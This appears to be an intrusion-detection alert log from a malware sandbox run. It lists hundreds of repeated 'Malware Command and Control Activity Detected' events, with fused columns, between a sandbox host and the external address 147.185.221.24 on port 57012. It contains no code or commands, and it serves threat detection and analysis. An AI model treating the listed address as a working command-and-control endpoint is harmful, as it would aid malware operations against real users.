                  2025-01-03T22:21:06.203266+010028529231Malware Command and Control Activity Detected192.168.2.549941147.185.221.2457012TCP
                  2025-01-03T22:21:06.395251+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:06.511189+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:06.631138+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:06.740557+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:06.905281+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:06.961054+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:07.069194+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:07.185375+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:07.289110+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:07.396683+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:07.506147+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:07.615913+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:07.724871+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:07.834222+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:07.943655+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:08.052925+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:08.162457+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:08.271831+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:08.381098+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:08.490595+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:08.606216+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:08.715048+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:08.849957+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:09.107397+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:09.244034+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:09.318773+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:09.428535+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:09.538069+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:09.667998+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:09.756176+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:09.865491+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:09.974865+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:10.303159+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:10.412508+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:10.521952+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:10.631214+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:10.740553+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:10.849894+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:10.959183+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:11.068587+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:11.177997+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:11.287581+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:11.396710+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:11.528483+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:11.638496+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:11.865514+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:11.975320+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:12.084282+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:12.193676+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:12.308118+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:12.412556+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:12.523016+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:12.631157+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:12.740541+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:12.849960+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:12.959203+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:13.068619+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:13.206068+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:13.318523+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:13.428043+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:13.537621+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:13.646815+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:13.756355+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:13.865430+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:13.974984+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:14.084368+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:14.275053+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:14.384655+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:14.506690+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:14.615398+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:14.724994+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:14.834181+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:14.943782+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:15.056048+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:15.164189+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:15.271709+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:15.382409+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:15.491321+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:15.599847+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:15.709200+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:15.818562+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:15.927898+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:16.037442+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:16.146716+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:16.258991+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:16.365551+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:16.474940+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:16.584134+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:16.695233+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:16.802963+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:16.964527+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:17.118865+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:17.404915+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:17.506327+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:17.615463+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:17.725035+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:17.756393+010028529231Malware Command and Control Activity Detected192.168.2.549941147.185.221.2457012TCP
                  2025-01-03T22:21:17.834350+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:17.943721+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:18.053060+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:18.162512+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:18.308123+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:18.381345+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:18.490547+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:18.599959+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:18.712103+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:18.818735+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:18.928055+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:19.039281+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:19.150163+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:19.256122+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:19.365473+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:19.476318+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:19.603984+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:19.710330+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:19.912918+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:20.121013+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:20.224917+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:20.334432+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:20.445079+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:20.553100+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:20.662347+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:20.771857+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:20.881106+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:20.990386+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:21.100101+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:21.209764+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:21.318697+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:21.457028+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:21.538561+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:21.646846+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:21.756331+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:21.867711+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:21.974999+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:22.084288+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:22.219435+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:22.303129+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:22.412965+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:22.793923+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:22.899190+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:23.006285+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:23.115411+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:23.225065+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:23.334310+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:23.443686+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:23.553107+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:23.662529+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:23.771935+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:23.881333+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:23.990559+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:24.099894+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:24.209562+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:24.318779+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:24.428093+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:24.537500+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:24.646802+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:24.756240+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:24.865712+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:24.975060+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:25.084454+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:25.194973+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:25.303035+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:25.412401+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:25.521747+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:25.631419+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:25.740507+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:25.849916+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:25.959299+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:26.068791+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:26.178065+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:26.289849+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:26.396798+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:26.506294+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:26.615762+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:26.724996+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:26.834213+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:26.972432+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:27.084194+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:27.193574+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:27.302945+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:27.412425+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:27.521690+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-03T22:21:13.734255+010028528741Malware Command and Control Activity Detected147.185.221.2457012192.168.2.549941TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-03T22:21:03.382141+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:03.523155+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:03.685455+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:03.872592+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:03.975438+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:04.084511+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:04.193679+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:04.303060+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:04.412583+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:04.524277+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:04.631208+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:04.740468+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:04.850000+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:04.959196+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:05.068790+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:05.178012+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:05.287431+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:05.396730+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:05.506204+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:05.615524+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:05.724951+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:05.834410+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:05.946087+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:06.053075+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:06.168996+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:06.395251+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:06.511189+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:06.631138+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:06.740557+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:06.905281+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:06.961054+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:07.069194+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:07.185375+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:07.289110+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:07.396683+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:07.506147+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:07.615913+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:07.724871+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:07.834222+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:07.943655+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:08.052925+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:08.162457+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:08.271831+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:08.381098+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:08.490595+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:08.606216+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:08.715048+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:08.849957+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:09.107397+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:09.244034+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:09.318773+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:09.428535+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:09.538069+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:09.667998+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:09.756176+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:09.865491+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:09.974865+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:10.303159+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:10.412508+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:10.521952+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:10.631214+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:10.740553+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:10.849894+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:10.959183+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:11.068587+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:11.177997+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:11.287581+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:11.396710+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:11.528483+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:11.638496+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:11.865514+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:11.975320+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:12.084282+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:12.193676+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:12.308118+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:12.412556+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:12.523016+010028528731Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
